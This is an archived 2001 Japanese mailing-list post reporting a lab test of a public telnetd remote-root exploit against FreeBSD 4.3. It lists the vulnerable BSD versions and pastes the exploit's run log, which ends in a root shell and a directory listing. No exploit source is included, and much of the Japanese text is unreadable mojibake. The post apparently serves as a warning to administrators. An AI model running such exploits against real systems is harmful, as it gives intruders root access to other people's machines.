[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[connect24h:03588] telnetd exploit
- To: "connect24h" <connect24h@xxxxxxxxxxxxxxxxxxxx>
- Subject: [connect24h:03588] telnetd exploit
- From: "okada" <hide@xxxxxxxxxxxxxxxx>
- Date: Wed, 25 Jul 2001 01:13:47 +0900
�$B2,ED!w$Z$s$.$s%o!<%k%I$G$9!#�(B
�(B
�(B
�(Btelnetd exploit�$B$5$C$=$/;n$7$F8+$^$7$?!#�(B
�(B
�$B%F%9%H4D6-�(B
�$B967b85�(B RedHatLinux 7.01J --> �$B967bBP>]�(B FreeBSD 4.3-RELEASE�$B$G�(Bexploit�$B@.8y!#�(B
�(B
�(Bls -l �$B$+$i$O�(Bexploit�$B8e$N>uBV$G$9!#�(B
�(Bexploit�$B$9$k$^$G;~4V$,$+$+$j$^$9$,!"$+$J$j0BDj$7$FF0:n$7$^$9!#$$$^$I$-�(Btelnetd
�$B6u$1$F�(B
�$B$$$k$H$3$m$J$s$F>/$J$$$s$G$7$g$&$,MWCm0U$G$9!#�(B
�(B
�(B
�$B%=!<%9$K$O�(B
�(B * tested against: BSDI BSD/OS 4.1
�(B * NetBSD 1.5
�(B * FreeBSD 3.1
�(B * FreeBSD 4.0-REL
�(B * FreeBSD 4.2-REL
�(B * FreeBSD 4.3-BETA
�(B * FreeBSD 4.3-STABLE
�(B * FreeBSD 4.3-RELEASE
�$B$H$"$k$N$G3:Ev$N;H$C$F$$$k?M$OFC$KCm0U$7$F$/$@$5$$!#�(B
�(B
�(B
�$B0J2<%m%0$G$9!#�(B
�(B
�(B[root@test /work]# ./�$B%(%/%9%W%m%$%I�(B �$B967bBP>]$N%[%9%H$N�(BIP
�(Bxxxxxxx - x86/bsd telnetd remote root
�(Bby zip, lorian, smiler and scut.
�(B
�(Bcheck: PASSED, using 16mb mode
�(B
�(B############################################################################
�(B#
�(B
�(Bok baby, times are rough, we send 16mb traffic to the remote
�(Btelnet daemon process, it will spill badly. but then, there is no
�(Bother way, sorry...
�(B
�(B## setting populators to populate heap address space
�(B## number of setenvs (dots / network): 31500
�(B## number of walks (percentage / cpu): 496140750
�(B##
�(B## the percentage is more realistic than the dots ;)
�(B
�(Bpercent |--------------------------------------------------------| ETA
�(B|
�(B 0.00% |. | --:--:--
�(B|
�(B �$B>JN,�(B
�(B 99.37% |....................................................... | 00:00:01
�(B|
�(B
�(B## sleeping for 10 seconds to let the process recover
�(B## ok, you should now have a root shell
�(B## as always, after hard times, there is a reward...
�(B
�(B
�(Bcommand: ÿ�$B!&�(Bls -l
�(Btotal 13237
�(B-rw-r--r-- 2 root wheel 802 Apr 21 18:10 .cshrc
�(B-rw-r--r-- 2 root wheel 251 Apr 21 18:10 .profile
�(B-r--r--r-- 1 root wheel 4735 Apr 21 18:10 COPYRIGHT
�(Bdrwxr-xr-x 2 root wheel 1024 Jun 19 23:54 bin
�(Bdrwxr-xr-x 3 root wheel 512 Jun 19 23:14 boot
�(Bdrwxr-xr-x 2 root wheel 512 Jun 20 06:58 cdrom
�(Blrwxr-xr-x 1 root wheel 11 Jun 20 07:23 compat -> /usr/compat
�(Bdrwxr-xr-x 3 root wheel 13824 Jul 25 00:39 dev
�(Bdrwxr-xr-x 2 root wheel 512 Jun 20 06:58 dist
�(Bdrwxr-xr-x 15 root wheel 2048 Jul 4 21:25 etc
�(Bdrwxr-xr-x 2 root wheel 512 Jun 23 19:28 fd
�(Bdrwxr-xr-x 2 root wheel 512 Jun 23 19:51 fdwork
�(Blrwxr-xr-x 1 root wheel 9 Jun 28 21:00 home -> /usr/home
�(B-r-xr-xr-x 1 root wheel 3352178 Apr 21 19:54 kernel
�(B-r-xr-xr-x 1 root wheel 3352178 Apr 21 19:54 kernel.GENERIC
�(Bdrwxr-xr-x 2 root wheel 512 Apr 21 18:02 mnt
�(Bdrwxr-xr-x 2 root wheel 3072 Jun 19 23:15 modules
�(Bdr-xr-xr-x 1 root wheel 512 Jul 25 00:58 proc
�(Bdrwxr-xr-x 7 root wheel 512 Jun 28 21:01 root
�(Bdrwxr-xr-x 2 root wheel 2048 Jun 19 23:54 sbin
�(Bdrwxr-xr-x 6 root wheel 1024 Jun 20 06:58 stand
�(Blrwxrwxrwx 1 root wheel 11 Jun 19 23:20 sys -> usr/src/sys
�(Bdrwxrwxrwt 7 root wheel 512 Jul 25 00:39 tmp
�(Bdrwxr-xr-x 18 root wheel 512 Jun 28 21:00 usr
�(Bdrwxr-xr-x 19 root wheel 512 Apr 21 20:02 var
�(Bl
�(Bexit
�(Bread remote: Operation now in progress
�(B[root@test /work]#
�(B
�(B
�(B
�(B------------------------------------------------------------------------
�$B!!$($C!"M'C#$H$N%Z%"$GKhF|#1#0#0K|1_$,Ev$?$k%A%c%s%9�(B!�$B!!!!3Z$T$?6f3ZIt�(B
�$B!!!!�(B http://www.rakupita.ne.jp/